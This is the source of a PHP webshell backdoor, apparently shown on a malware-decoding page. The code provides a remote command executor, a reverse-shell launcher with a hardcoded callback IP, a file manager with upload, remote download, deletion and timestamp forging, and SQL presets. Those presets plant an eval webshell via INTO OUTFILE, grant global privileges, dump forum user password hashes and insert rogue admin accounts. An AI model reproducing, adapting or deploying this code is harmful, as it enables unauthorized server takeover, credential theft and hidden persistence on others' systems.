		} 
		break; 
		case "MsSql" :  
		if(function_exists('mssql_close')){ 
			$dbconn = @mssql_connect($sqlhost,$sqluser,$sqlpass); 
			if($dbconn) { 
				$msg = '<h2>'.$type.' </h2>'; 
				mssql_select_db($sqlname,$dbconn); 
				$result = mssql_query($sqlcode); 
				if($result) { $msg .= '<h2> - SQL</h2>'; while ($array = mssql_fetch_array($result)) { $rows[] = $array; } } 
				else { $msg .= '<h1> - SQL</h1>'; } 
				@mssql_free_result($result); 
			} else { 
				$msg = '<h1>'.$type.'</h1>'; 
			} 
			@mssql_close($dbconn); 
		} else { 
			$msg = '<h1>'.$type.'</h1>'; 
		} 
		break; 
		case "Oracle" :  
		if(function_exists('oci_close')){ 
			$conn = @oci_connect($sqluser,$sqlpass,$sqlhost.'/'.$sqlname); 
			if($conn) { 
				$msg = '<h2>'.$type.' </h2>'; 
				$stid = oci_parse($conn,$sqlcode); 
				oci_execute($stid); 
				if($stid) { $msg .= '<h2> - SQL</h2>'; while (($array = oci_fetch_array($stid,OCI_ASSOC))) { $rows[] = $array; } } 
				else { $msg .= '<h1> - SQL</h1>'; $e = oci_error(); $rows = array('error' => $e['message']); } 
				oci_free_statement($stid); 
			} else { 
				$e = oci_error(); $rows = array('error' => $e['message']); 
				$msg = '<h1>'.$type.'</h1>'; 
			} 
			@oci_close($conn); 
		} else { 
			$msg = '<h1>'.$type.'</h1>'; 
		} 
		break; 
		case "MySql" :  
		if(function_exists('mysql_close')){ 
			$conn = mysql_connect(strstr($sqlhost,':') ? $sqlhost : $sqlhost.':3306',$sqluser,$sqlpass,$sqlname); 
			if($conn) { 
				$msg = '<h2>'.$type.' </h2>'; 
				if(substr($sqlcode,0,6) == 't00lsa') { 
					$array = array(); $data = ''; $i = 0; 
					preg_match_all('/t00lsa\s*\'(.*)\'\s*t00lsb\s*\'(.*)\'\s*t00lsc\s*\'(.*)\'\s*t00lsfile\s*\'(.*)\'/i',$sqlcode,$array); 
					if($array[1][0] && $array[2][0] && $array[3][0] && $array[4][0]) { 
						mysql_select_db($array[1][0],$conn); 
						mysql_query('set names '.$names,$conn); 
						$spidercode = 'select '.$array[3][0].' from `'.$array[2][0].'`;'; 
						$result = mysql_query($spidercode,$conn); 
						if($result) { 
							while($row = mysql_fetch_array($result,MYSQL_ASSOC)) { $data .= join('{~}',$row)."\r\n"; $i++; } 
							if($data) { 
								$file = strdir($array[4][0]); 
								$msg .= filew($file,$data,'w') ? '<h2> - </h2>' : '<h1> - </h1>'; 
								$rows = array('file' => $file,size(filesize($file)) => ''.$i.''); 
							} 
							else { $msg .= '<h1> - </h1>'; } 
						} 
						else { $msg .= '<h1> - SQL</h1>'; $rows = array('errno' => mysql_errno(),'error' => mysql_error()); } 
					} 
					else { $msg .= '<h1> - </h1>'; } 
				} elseif(!empty($sqlcode)) { 
					mysql_select_db($sqlname,$conn); 
					mysql_query('set names '.$names,$conn); 
					$result = mysql_query($sqlcode,$conn); 
					if($result) { $msg .= '<h2> - SQL</h2>'; while($array = mysql_fetch_array($result,MYSQL_ASSOC)) { $rows[] = $array; } } 
					else { $msg .= '<h1> - SQL</h1>'; $rows = array('errno' => mysql_errno(),'error' => mysql_error()); } 
				} 
				mysql_free_result($result); 
			} else { 
				$msg = '<h1>'.$type.'</h1>'; 
				$rows = array('errno' => mysql_errno(),'error' => mysql_error()); 
			} 
			mysql_close($conn); 
		} else { 
			$msg = '<h1>'.$type.'</h1>'; 
		} 
		break; 
	} 
} else { 
	$type = 'MySql'; 
	$sqlhost = 'localhost:3306'; 
	$sqluser = 'root'; 
	$sqlpass = '123456'; 
	$sqlname = 'mysql'; 
	$sqlcode = 'select version();'; 
	$names = 'gbk'; 
} 
echo '<div class="msgbox">'.$msg.'</div>'; 
echo '<form method="POST">'; 
subeval(); 
echo '<input type="hidden" name="go" id="go" value="sql">'; 
echo '<table class="tables"><tr><th style="width:15%;"></th><th></th></tr>'; 
echo '<tr><td></td><td>'; 
$dbs = array('MySql','MsSql','Oracle','PostgreSql'); 
foreach($dbs as $dbname) { echo '<label><input type="radio" name="type" value="'.$dbname.'"'.($type == $dbname ? ' checked' : '').'>'.$dbname.'</label> '; } 
echo '</td></tr><tr><td></td><td> <input type="text" name="sqlhost" style="width:188px;" value="'.$sqlhost.'"> '; 
echo ' <input type="text" name="sqluser" style="width:108px;" value="'.$sqluser.'"> '; 
echo ' <input type="text" name="sqlpass" style="width:108px;" value="'.$sqlpass.'"> '; 
echo ' <input type="text" name="sqlname" style="width:108px;" value="'.$sqlname.'"></td></tr>'; 
echo '<tr><td><br>'; 
echo '<select onchange="$(\'sqlcode\').value=options[selectedIndex].value">'; 
echo '<option value="select version();">------</option>'; 
echo '<option value="select \'<?php eval ($_POST[cmd]);?>\' into outfile \'D:/web/shell.php\';"></option>'; 
echo '<option value="GRANT ALL PRIVILEGES ON *.* TO \''.$sqluser.'\'@\'%\' IDENTIFIED BY \''.$sqlpass.'\' WITH GRANT OPTION;"></option>'; 
echo '<option value="show variables;"></option>'; 
echo '<option value="create database t00ls;"></option>'; 
echo '<option value="create table `t00ls` (`id` INT(10) NOT NULL ,`user` VARCHAR(32) NOT NULL ,`pass` VARCHAR(32) NOT NULL) TYPE = MYISAM;"></option>'; 
echo '<option value="show databases;"></option>'; 
echo '<option value="show tables from `'.$sqlname.'`;"></option>'; 
echo '<option value="show columns from `t00ls`;"></option>'; 
echo '<option value="drop table `t00ls`;"></option>'; 
echo '<option value="select username,password,salt,email from `pre_ucenter_members` limit 0,30;"></option>'; 
echo '<option value="insert into `admin` (`user`,`pass`) values (\'t00ls\', \'f1a81d782dea6a19bdca383bffe68452\');"></option>'; 
echo '<option value="update `admin` set `user` = \'t00ls1\',`pass` = \'50de237e389600acadbeda3d6e6e0b1f\' where `user` = \'t00ls\' and `pass` = \'f1a81d782dea6a19bdca383bffe68452\' limit 1;"></option>'; 
echo '<option value="t00lsa \'discuzx25\' t00lsb \'pre_ucenter_members\' t00lsc \'username,password,salt,email\' t00lsfile \''.THISDIR.'out.txt\';">(MySql)</option>'; 
echo '</select>'; 
echo '</td><td><textarea name="sqlcode" id="sqlcode" style="width:680px;height:80px;">'.htmlspecialchars($sqlcode).'</textarea></td></tr>'; 
echo '<tr><td></td><td><select name="names">'; 
$charsets = array('gbk','utf8','big5','latin1','cp866','ujis','euckr','koi8r','koi8u'); 
foreach($charsets as $charset) { echo '<option value="'.$charset.'"'.($names == $charset ? ' selected' : '').'>'.$charset.'</option>'; } 
echo '</select> <input type="submit" style="width:80px;" value=""></td></tr>'; 
echo '</table></form>'; 
if($rows) { 
	echo '<pre style="padding:5px;background:#F8F8F8;text-align:left;">'; 
	ob_start(); 
	print_r($rows); 
	$out = ob_get_contents(); 
	ob_end_clean(); 
	if(preg_match('~[\x{4e00}-\x{9fa5}]+~u',$out) && function_exists('iconv')) { $out = @iconv('UTF-8','GB2312//IGNORE',$out); } 
	echo htmlspecialchars($out); 
	echo '</pre>'; 
} 
break; 
 
case "backshell" :  
if((!empty($_POST['backip'])) && (!empty($_POST['backport']))) { 
	$backip = $_POST['backip']; 
	$backport = $_POST['backport']; 
	$temp = $_POST['temp'] ? $_POST['temp'] : '/tmp'; 
	$type = $_POST['type']; 
	$msg = backshell($backip,$backport,$temp,$type); 
} else { 
	$backip = '222.73.219.91'; 
	$backport = '443'; 
	$temp = '/tmp'; 
	$type = 'pl'; 
} 
echo '<div class="msgbox">'.$msg.'</div>'; 
echo '<form method="POST">'; 
subeval(); 
echo '<input type="hidden" name="go" id="go" value="backshell">'; 
echo '<table class="tables"><tr><th style="width:15%;"></th><th></th></tr>'; 
echo '<tr><td></td><td><input type="text" name="backip" style="width:268px;" value="'.$backip.'"> (Your ip)</td></tr>'; 
echo '<tr><td></td><td><input type="text" name="backport" style="width:268px;" value="'.$backport.'"> (nc -vvlp '.$backport.')</td></tr>'; 
echo '<tr><td></td><td><input type="text" name="temp" style="width:268px;" value="'.$temp.'"> (Only Linux)</td></tr>'; 
echo '<tr><td></td><td>'; 
$types = array('pl' => 'Perl','py' => 'Python','c' => 'C-bin','pcntl' => 'Pcntl','php' => 'PHP','phpwin' => 'PHP-WS'); 
foreach($types as $key => $name) { echo '<label><input type="radio" name="type" value="'.$key.'"'.($key == $type ? ' checked' : '').'>'.$name.'</label> '; } 
echo '</td></tr><tr><td></td><td><input type="submit" style="width:80px;" value=""></td></tr>'; 
echo '</table></form>'; 
break; 
 
case "edit" : case "editor" :  
$file = strdir($_POST['godir'].'/'.$_POST['govar']); 
$iconv = function_exists('iconv'); 
if(!file_exists($file)) { 
	$msg = ''; 
} else { 
	$code = filer($file); 
	$chst = ''; 
	if(preg_match('~[\x{4e00}-\x{9fa5}]+~u',$code) && $iconv) { $chst = 'utf-8'; $code = @iconv('UTF-8','GB2312//IGNORE',$code); } 
	$size = size(filesize($file)); 
	$msg = ' '.substr(decoct(fileperms($file)),-4).'  '.$size.'  '.$chst.''; 
} 
echo base64_decode('PHNjcmlwdCBsYW5ndWFnZT0iamF2YXNjcmlwdCI+DQp2YXIgbiA9IDA7DQpmdW5jdGlvbiBzZWFyY2goc3RyKSB7DQoJdmFyIHR4dCwgaSwgZm91bmQ7DQoJaWYoc3RyID09ICIiKSByZXR1cm4gZmFsc2U7DQoJdHh0ID0gJCgnZmlsZWNvZGUnKS5jcmVhdGVUZXh0UmFuZ2UoKTsNCglmb3IoaSA9IDA7IGkgPD0gbiAmJiAoZm91bmQgPSB0eHQuZmluZFRleHQoc3RyKSkgIT0gZmFsc2U7IGkrKyl7DQoJCXR4dC5tb3ZlU3RhcnQoImNoYXJhY3RlciIsIDEpOw0KCQl0eHQubW92ZUVuZCgidGV4dGVkaXQiKTsNCgl9DQoJaWYoZm91bmQpeyB0eHQubW92ZVN0YXJ0KCJjaGFyYWN0ZXIiLCAtMSk7IHR4dC5maW5kVGV4dChzdHIpOyB0eHQuc2VsZWN0KCk7IHR4dC5zY3JvbGxJbnRvVmlldygpOyBuKys7IH0NCgllbHNlIHsgaWYgKG4gPiAwKSB7IG4gPSAwOyBzZWFyY2goc3RyKTsgfSBlbHNlIGFsZXJ0KHN0ciArICIuLi4gTm90LUZpbmQiKTsgfQ0KCXJldHVybiBmYWxzZTsNCn0NCjwvc2NyaXB0Pg=='); 
echo '<div class="msgbox"><input name="keyword" id="keyword" type="text" style="width:138px;height:15px;"><input type="button" value="IE" onclick="search($(\'keyword\').value);"> - '.$msg.'</div>'; 
echo '<form name="editfrm" id="editfrm" method="POST">'; 
subeval(); 
echo '<input type="hidden" name="go" value=""><input type="hidden" name="act" id="act" value="edit">'; 
echo '<input type="hidden" name="dir" id="dir" value="'.dirname($file).'">'; 
echo '<div class="actall"> <input type="text" name="filename" value="'.$file.'" style="width:528px;"> '; 
if($iconv) { 
	echo ' <select name="tostr">'; 
	$selects = array('normal' => '','utf' => 'utf-8'); 
	foreach($selects as $var => $name) { echo '<option value="'.$var.'"'.($name == $chst ? ' selected' : '').'>'.$name.'</option>'; } 
	echo '</select>'; 
} 
echo '</div><div class="actall"><textarea name="filecode" id="filecode" style="width:698px;height:358px;">'.htmlspecialchars($code).'</textarea></div></form>'; 
echo '<div class="actall" style="padding:5px;padding-right:68px;"><input type="button" onclick="$(\'editfrm\').submit();" value="" style="width:80px;"> '; 
echo '<form name="backfrm" id="backfrm" method="POST"><input type="hidden" name="go" value=""><input type="hidden" name="dir" id="dir" value="'.dirname($file).'">'; 
subeval(); 
echo '<input type="button" onclick="$(\'backfrm\').submit();" value="" style="width:80px;"></form></div>'; 
break; 
 
case "upfiles" :  
$updir = isset($_POST['updir']) ? $_POST['updir'] : $_POST['godir']; 
$msg = ' '.get_cfg_var("upload_max_filesize").' POST '.get_cfg_var("post_max_size").''; 
$max = 10; 
if(isset($_FILES['uploads']) && isset($_POST['renames'])) { 
	$uploads = $_FILES['uploads']; 
	$msgs = array(); 
	for($i = 1;$i < $max;$i++) { 
		if($uploads['error'][$i] == UPLOAD_ERR_OK) { 
			$rename = $_POST['renames'][$i] == '' ? $uploads['name'][$i] : $_POST['renames'][$i]; 
			$filea = $uploads['tmp_name'][$i]; 
			$fileb = strdir($updir.'/'.$rename); 
			$msgs[$i] = fileu($filea,$fileb) ? '<br><h2> '.$rename.'</h2>' : '<br><h1> '.$rename.'</h1>'; 
		} 
	} 
} 
echo '<div class="msgbox">'.$msg.'</div>'; 
echo '<form name="upsfrm" id="upsfrm" method="POST" enctype="multipart/form-data">'; 
subeval(); 
echo '<input type="hidden" name="go" value="upfiles"><input type="hidden" name="act" id="act" value="upload">'; 
echo '<div class="actall"><p> <input type="text" name="updir" style="width:398px;" value="'.$updir.'"></p>'; 
for($i = 1;$i < $max;$i++) { echo '<p>'.$i.' <input type="file" name="uploads['.$i.']" style="width:300px;">  <input type="text" name="renames['.$i.']" style="width:128px;"> '.$msgs[$i].'</p>'; } 
echo '</div></form><div class="actall" style="padding:8px;padding-right:68px;"><input type="button" onclick="$(\'upsfrm\').submit();" value="" style="width:80px;"> '; 
echo '<form name="backfrm" id="backfrm" method="POST"><input type="hidden" name="go" value=""><input type="hidden" name="dir" id="dir" value="'.$updir.'">'; 
subeval(); 
echo '<input type="button" onclick="$(\'backfrm\').submit();" value="" style="width:80px;"></form></div>'; 
break; 
 
default :  
 
if(isset($_FILES['upfile'])) { 
	if($_FILES['upfile']['name'] == '') { $msg = '<h1></h1>'; } 
	else { $rename = $_POST['rename'] == '' ? $_FILES['upfile']['name'] : $_POST['rename']; $filea = $_FILES['upfile']['tmp_name']; $fileb = strdir($nowdir.$rename); $msg = fileu($filea,$fileb) ? '<h2>'.$rename.'</h2>' : '<h1>'.$rename.'</h1>'; } 
} 
 
if(isset($_POST['act'])) { 
	switch($_POST['act']) { 
		case "a" :  
			if(!$_POST['files']) { $msg = '<h1> '.$_POST['var'].'</h1>'; } 
			else { $i = 0; foreach($_POST['files'] as $filename) { $i += @copy(strdir($nowdir.$filename),strdir($_POST['var'].'/'.$filename)) ? 1 : 0; } $msg =  $msg = $i ? '<h2> '.$i.' '.$_POST['var'].'</h2>' : '<h1> '.$i.' '.$_POST['var'].'</h1>'; } 
		break; 
		case "b" :  
			if(!$_POST['files']) { $msg = '<h1></h1>'; } 
			else { $i = 0; foreach($_POST['files'] as $filename) { $i += @unlink(strdir($nowdir.$filename)) ? 1 : 0; } $msg = $i ? '<h2> '.$i.' </h2>' : '<h1> '.$i.' </h1>'; } 
		break; 
		case "c" :  
			if(!$_POST['files']) { $msg = '<h1> '.$_POST['var'].'</h1>'; } 
			elseif(!ereg("^[0-7]{4}$",$_POST['var'])) { $msg = '<h1></h1>'; } 
			else { $i = 0; foreach($_POST['files'] as $filename) { $i += @chmod(strdir($nowdir.$filename),base_convert($_POST['var'],8,10)) ? 1 : 0; } $msg = $i ? '<h2> '.$i.' '.$_POST['var'].'</h2>' : '<h1> '.$i.' '.$_POST['var'].'</h1>'; } 
		break; 
		case "d" :  
			if(!$_POST['files']) { $msg = '<h1> '.$_POST['var'].'</h1>'; } 
			elseif(!preg_match('/(\d+)-(\d+)-(\d+) (\d+):(\d+):(\d+)/',$_POST['var'])) { $msg = '<h1> '.$_POST['var'].'</h1>'; } 
			else { $i = 0; foreach($_POST['files'] as $filename) { $i += @touch(strdir($nowdir.$filename),strtotime($_POST['var'])) ? 1 : 0; } $msg = $i ? '<h2> '.$i.' '.$_POST['var'].'</h2>' : '<h1> '.$i.' '.$_POST['var'].'</h1>'; } 
		break; 
		case "e" :  
			$path = strdir($nowdir.$_POST['var'].'/'); 
			if(file_exists($path)) { $msg = '<h1> '.$_POST['var'].'</h1>'; } 
			else { $msg = @mkdir($path,0777) ? '<h2> '.$_POST['var'].' </h2>' : '<h1> '.$_POST['var'].' </h1>'; } 
		break; 
		case "f" :  
			$context = array('http' => array('timeout' => 30)); 
			if(function_exists('stream_context_create')) { $stream = stream_context_create($context); } 
			$data = @file_get_contents ($_POST['var'],false,$stream); 
			$filename = array_pop(explode('/',$_POST['var'])); 
			if($data) { $msg = filew(strdir($nowdir.$filename),$data,'wb') ? '<h2> '.$filename.' </h2>' : '<h1> '.$filename.' </h1>'; } else { $msg = '<h1></h1>'; } 
		break; 
		case "rf" :  
			$files = explode('|x|',$_POST['var']); 
			if(count($files) != 2) { $msg = '<h1></h1>'; } 
			else { $msg = @rename(strdir($nowdir.$files[1]),strdir($nowdir.$files[0])) ? '<h2> '.$files[1].'  '.$files[0].' </h2>' : '<h1> '.$files[1].'  '.$files[0].' </h1>'; } 
		break; 
		case "pd" :  
			$files = explode('|x|',$_POST['var']); 
			if(count($files) != 2) { $msg = '<h1></h1>'; } 
			else { $path = strdir($nowdir.$files[1]); $msg = @chmod($path,base_convert($files[0],8,10)) ? '<h2>'.$files[1].''.$files[0].'</h2>' : '<h1>'.$files[1].''.$files[0].'</h1>'; } 
		break; 
		case "edit" :  
			if(isset($_POST['filename']) && isset($_POST['filecode'])) { if($_POST['tostr'] == 'utf') { $_POST['filecode'] = @iconv('GB2312//IGNORE','UTF-8',$_POST['filecode']); } $msg = filew($_POST['filename'],$_POST['filecode'],'w') ? '<h2> '.$_POST['filename'].'</h2>' : '<h1> '.$_POST['filename'].'</h1>'; } 
		break; 
		case "deltree" :  
			$deldir = strdir($nowdir.$_POST['var'].'/'); 
			if(!file_exists($deldir)) { $msg = '<h1> '.$_POST['var'].' </h1>'; } 
			else { $msg = deltree($deldir) ? '<h2> '.$_POST['var'].' </h2>' : '<h1> '.$_POST['var'].' </h1>'; } 
		break; 
	} 
} 
 
$chmod = substr(decoct(fileperms($nowdir)),-4); 
if(!$chmod) { $msg .= ' - <h1></h1>'; } 
 
$array = showdir($nowdir); 
$thisurl = strdir('/'.strtr($nowdir,array(ROOTDIR => '')).'/'); 
$nowdir = strtr($nowdir,array('\'' => '%27','"' => '%22')); 
echo '<div class="msgbox">'.$msg.'</div>'; 
echo '<div class="actall"><form name="frm" id="frm" method="POST">'; 
subeval(); 
echo (is_writable($nowdir) ? '<h2></h2>' : '<h1></h1>').' <input type="text" name="dir" id="dir" style="width:508px;" value="'.strdir($nowdir.'/').'"> '; 
echo '<input type="button" onclick="$(\'frm\').submit();" style="width:50px;" value=""> '; 
echo '<input type="button" onclick="cd(\''.ROOTDIR.'\');" style="width:68px;" value=""> '; 
echo '<input type="button" onclick="cd(\''.THISDIR.'\');" style="width:68px;" value=""> '; 
echo '<select onchange="cd(options[selectedIndex].value);">'; 
echo '<option>------</option>'; 
echo '<option value="C:/RECYCLER/">Win-RECYCLER</option>'; 
echo '<option value="C:/$Recycle.Bin/">Win-$Recycle</option>'; 
echo '<option value="C:/Program Files/">Win-Program</option>'; 
echo '<option value="C:/Documents and Settings/All Users/Start Menu/Programs/Startup/">Win-Startup</option>'; 
echo '<option value="C:/Documents and Settings/All Users////">Win-</option>'; 
echo '<option value="C:/Windows/Temp/">Win-TEMP</option>'; 
echo '<option value="/usr/local/">Linux-local</option>'; 
echo '<option value="/tmp/">Linux-tmp</option>'; 
echo '<option value="/var/tmp/">Linux-var</option>'; 
echo '<option value="/etc/ssh/">Linux-ssh</option>'; 
echo '</select></form></div><div class="actall">'; 
 
echo '<input type="button" value="" onclick="nf(\'edit\',\'newfile.php\');" style="width:68px;"> '; 
echo '<input type="button" value="" onclick="txts(\'\',\'newdir\',\'e\');" style="width:68px;"> '; 
echo '<input type="button" value="" onclick="txts(\'\',\'http://www.baidu.com/cmd.exe\',\'f\');" style="width:68px;"> '; 
echo '<input type="button" value="" onclick="go(\'upfiles\',\''.$nowdir.'\');" style="width:68px;"> '; 
 
echo '<form name="upfrm" id="upfrm" method="POST" enctype="multipart/form-data">'; 
subeval(); 
echo '<input type="hidden" name="dir" id="dir" value="'.$nowdir.'">'; 
echo '<input type="file" name="upfile" style="width:286px;height:21px;"> '; 
echo '<input type="button" onclick="$(\'upfrm\').submit();" value="" style="width:50px;"> '; 
echo ' <input type="text" name="rename" style="width:128px;">'; 
echo '</form></div>'; 
 
echo '<form name="frm1" id="frm1" method="POST"><table class="tables">'; 
subeval(); 
echo '<input type="hidden" name="dir" id="dir" value="'.$nowdir.'">'; 
echo '<input type="hidden" name="act" id="act" value="">'; 
echo '<input type="hidden" name="var" id="var" value="">'; 
echo '<th><a href="javascript:cd(\''.dirname($nowdir).'/\');"></a></th><th style="width:8%"></th><th style="width:5%"></th><th style="width:17%"></th><th style="width:17%"></th><th style="width:8%"></th>'; 
if($array) { 
	asort($array['dir']); 
	asort($array['file']); 
	$dnum = $fnum = 0; 
	foreach($array['dir'] as $path => $name) { 
		$prem = substr(decoct(fileperms($path)),-4); 
		$ctime = date('Y-m-d H:i:s',filectime($path)); 
		$mtime = date('Y-m-d H:i:s',filemtime($path)); 
		echo '<tr>'; 
		echo '<td><a href="javascript:cd(\''.$nowdir.$name.'\');"><b>'.strtr($name,array('%27' => '\'','%22' => '"')).'</b></a></td>'; 
		echo '<td><a href="javascript:dels(\''.$name.'\');"></a> '; 
		echo '<a href="javascript:acts(\''.$name.'\',\'rf\',\''.$name.'\');"></a></td>'; 
		echo '<td><a href="javascript:acts(\''.$prem.'\',\'pd\',\''.$name.'\');">'.$prem.'</a></td>'; 
		echo '<td>'.$ctime.'</td>'; 
		echo '<td>'.$mtime.'</td>'; 
		echo '<td>-</td>'; 
		echo '</tr>'; 
		$dnum++; 
	} 
	foreach($array['file'] as $path => $name) { 
		$prem = substr(decoct(fileperms($path)),-4); 
		$ctime = date('Y-m-d H:i:s',filectime($path)); 
		$mtime = date('Y-m-d H:i:s',filemtime($path)); 
		$size = size(filesize($path)); 
		echo '<tr>'; 
		echo '<td><input type="checkbox" name="files[]" value="'.$name.'"><a target="_blank" href="'.$thisurl.$name.'">'.strtr($name,array('%27' => '\'','%22' => '"')).'</a></td>'; 
		echo '<td><a href="javascript:go(\'edit\',\''.$name.'\');"></a> '; 
		echo '<a href="javascript:acts(\''.$name.'\',\'rf\',\''.$name.'\');"></a></td>'; 
		echo '<td><a href="javascript:acts(\''.$prem.'\',\'pd\',\''.$name.'\');">'.$prem.'</a></td>'; 
		echo '<td>'.$ctime.'</td>'; 
		echo '<td>'.$mtime.'</td>'; 
		echo '<td align="right"><a href="javascript:go(\'down\',\''.$name.'\');">'.$size.'</a></td>'; 
		echo '</tr>'; 
		$fnum++; 
	} 
} 
unset($array); 
echo '</table>'; 
echo '<div class="actall" style="text-align:left;">'; 
echo '<input type="checkbox" id="chkall" name="chkall" value="on" onclick="sa(this.form);"> '; 
echo '<input type="button" value="" style="width:50px;" onclick=\'txts("","'.$nowdir.'","a");\'> '; 
echo '<input type="button" value="" style="width:50px;" onclick=\'dels("b");\'> '; 
echo '<input type="button" value="" style="width:50px;" onclick=\'txts("","0666","c");\'> '; 
echo '<input type="button" value="" style="width:50px;" onclick=\'txts("","'.$mtime.'","d");\'> '; 
echo '['.$dnum.'] - ['.$fnum.'] - ['.$chmod.']</div></form>'; 
break; 
} 
?> 

Did this file decode correctly?

Original Code

<?php
error_reporting(E_ERROR);
@ini_set('display_errors','Off');
@ini_set('max_execution_time',20000);
@ini_set('memory_limit','256M');
header("content-Type: text/html; charset=utf-8");
$password = "2aefc34200a294a3cc7db81b43a81873"; //V
define('B','Denzel-'); // 

function strdir($str) { return str_replace(array('\\','//','%27','%22'),array('/','/','\'','"'),chop($str)); }
function chkgpc($array) { foreach($array as $key => $var) { $array[$key] = is_array($var) ? chkgpc($var) : stripslashes($var); } return $array; }
$myfile = $_SERVER['SCRIPT_FILENAME'] ? strdir($_SERVER['SCRIPT_FILENAME']) : strdir(__FILE__);
$myfile = strpos($myfile,'eval()') ? array_shift(explode('(',$myfile)) : $myfile;
define('THISDIR',strdir(dirname($myfile).'/'));
define('ROOTDIR',strdir(strtr($myfile,array(strdir($_SERVER['PHP_SELF']) => '')).'/'));
define('EXISTS_PHPINFO',getinfo() ? true : false);
if(get_magic_quotes_gpc()) { $_POST = chkgpc($_POST); }
if(function_exists('mysql_close')) { $issql = 'MySql'; }
if(function_exists('mssql_close')) $issql .= ' - MsSql';
if(function_exists('oci_close')) $issql .= ' - Oracle';
if(function_exists('sybase_close')) $issql .= ' - SyBase';
if(function_exists('pg_close')) $issql .= ' - PostgreSql';
$win = substr(PHP_OS,0,3) == 'WIN' ? true : false;
$msg = VERSION;

function filew($filename,$filedata,$filemode) {
	if((!is_writable($filename)) && file_exists($filename)) { chmod($filename,0666); }
	$handle = fopen($filename,$filemode);
	$key = fputs($handle,$filedata);
	fclose($handle);
	return $key;
}

function filer($filename) {
	$handle = fopen($filename,'r');
	$filedata = fread($handle,filesize($filename));
	fclose($handle);
	return $filedata;
}

function fileu($filenamea,$filenameb) {
	$key = move_uploaded_file($filenamea,$filenameb) ? true : false;
	if(!$key) { $key = copy($filenamea,$filenameb) ? true : false; }
	return $key;
}

function filed($filename) {
	if(!file_exists($filename)) return false;
	ob_end_clean();
	$name = basename($filename);
	$array = explode('.',$name);
	header('Content-type: application/x-'.array_pop($array));
	header('Content-Disposition: attachment; filename='.$name);
	header('Content-Length: '.filesize($filename));
	@readfile($filename);
	exit;
}

function showdir($dir) {
	$dir = strdir($dir.'/');
	if(($handle = @opendir($dir)) == NULL) return false;
	$array = array();
	while(false !== ($name = readdir($handle))) {
		if($name == '.' || $name == '..') continue;
		$path = $dir.$name;
		$name = strtr($name,array('\'' => '%27','"' => '%22'));
		if(is_dir($path)) { $array['dir'][$path] = $name; }
		else { $array['file'][$path] = $name; }
	}
	closedir($handle);
	return $array;
}

function deltree($dir) {
	$handle = @opendir($dir);
	while(false !== ($name = @readdir($handle))) {
		if($name == '.' || $name == '..') continue;
		$path = $dir.$name;
		@chmod($path,0777);
		if(is_dir($path)) { deltree($path.'/'); }
		else { @unlink($path); }
	}
	@closedir($handle);
	return @rmdir($dir);
}

function size($bytes) {
	if($bytes < 1024) return $bytes.' B';
	$array = array('B','K','M','G','T');
	$floor = floor(log($bytes) / log(1024));
	return sprintf('%.2f '.$array[$floor],($bytes/pow(1024,floor($floor))));
}

function find($array,$string) {
	foreach($array as $key) { if(stristr($string,$key)) return true; }
	return false;
}

function scanfile($dir,$key,$inc,$fit,$tye,$chr,$ran,$now) {
	if(($handle = @opendir($dir)) == NULL) return false;
	while(false !== ($name = readdir($handle))) {
		if($name == '.' || $name == '..') continue;
		$path = $dir.$name;
		if(is_dir($path)) { if($fit && in_array($name,$fit)) continue; if($ran == 0 && is_readable($path)) scanfile($path.'/',$key,$inc,$fit,$tye,$chr,$ran,$now); }
		else {
			if($inc && (!find($inc,$name))) continue;
			$code = $tye ? filer($path) : $name;
			$find = $chr ? stristr($code,$key) : (strpos(size(filesize($path)),'M') ? false : (strpos($code,$key) > -1));
			if($find) {
				$file = strtr($path,array($now => '','\'' => '%27','"' => '%22'));
				echo '<a href="javascript:go(\'editor\',\''.$file.'\');"></a> '.$path.'<br>';
				flush(); ob_flush();
			}
			unset($code);
		}
	}
	closedir($handle);
	return true;
}

function antivirus($dir,$exs,$matches,$now) {
	if(($handle = @opendir($dir)) == NULL) return false;
	while(false !== ($name = readdir($handle))) {
		if($name == '.' || $name == '..') continue;
		$path = $dir.$name;
		if(is_dir($path)) { if(is_readable($path)) antivirus($path.'/',$exs,$matches,$now); }
		else {
			$iskill = NULL;
			foreach($exs as $key => $ex) { if(find(explode('|',$ex),$name)) { $iskill = $key; break; } }
			if(strpos(size(filesize($path)),'M')) continue;
			if($iskill) {
				$code = filer($path);
				foreach($matches[$iskill] as $matche) {
					$array = array();
					preg_match($matche,$code,$array);
					if(strpos($array[0],'$this->') || strpos($array[0],'[$vars[')) continue;
					$len = strlen($array[0]);
					if($len > 6 && $len < 200) {
						$file = strtr($path,array($now => '','\'' => '%27','"' => '%22'));
						echo ' <input type="text" value="'.htmlspecialchars($array[0]).'"> <a href="javascript:go(\'editor\',\''.$file.'\');"></a> '.$path.'<br>';
						flush(); ob_flush(); break;
					}
				}
				unset($code,$array);
			}
		}
	}
	closedir($handle);
	return true;
}

function command($cmd,$cwd,$com = false) {
	$iswin = substr(PHP_OS,0,3) == 'WIN' ? true : false; $res = $msg = '';
	if($cwd == 'com' || $com) {
		if($iswin && class_exists('COM')) {
			$wscript = new COM('Wscript.Shell');
			$exec = $wscript->exec('c:\\windows\\system32\\cmd.exe /c '.$cmd);
			$stdout = $exec->StdOut();
			$res = $stdout->ReadAll();
			$msg = 'Wscript.Shell';
		}
	} else {
		chdir($cwd); $cwd = getcwd();
		if(function_exists('exec')) { @exec ($cmd,$res); $res = join("\n",$res); $msg = 'exec'; }
		elseif(function_exists('shell_exec')) { $res = @shell_exec ($cmd); $msg = 'shell_exec'; }
		elseif(function_exists('system')) { ob_start(); @system ($cmd); $res = ob_get_contents(); ob_end_clean(); $msg = 'system'; }
		elseif(function_exists('passthru')) { ob_start(); @passthru ($cmd); $res = ob_get_contents(); ob_end_clean(); $msg = 'passthru'; }
		elseif(function_exists('popen')) { $fp = @popen ($cmd,'r'); if($fp) { while(!feof($fp)) { $res .= fread($fp,1024); } } @pclose($fp); $msg = 'popen'; }
		elseif(function_exists('proc_open')) {
			$env = $iswin ? array('path' => 'c:\\windows\\system32') : array('path' => '/bin:/usr/bin:/usr/local/bin:/usr/local/sbin:/usr/sbin');
			$des = array(0 => array("pipe","r"),1 => array("pipe","w"),2 => array("pipe","w"));
			$process = @proc_open ($cmd,$des,$pipes,$cwd,$env);
			if(is_resource($process)) { fwrite($pipes[0],$cmd); fclose($pipes[0]); $res .= stream_get_contents($pipes[1]); fclose($pipes[1]); $res .= stream_get_contents($pipes[2]); fclose($pipes[2]); }
			@proc_close($process);
			$msg = 'proc_open';
		}
	}
	$msg = $res == '' ? '<h1>NULL</h1>' : '<h2>'.$msg.'</h2>';
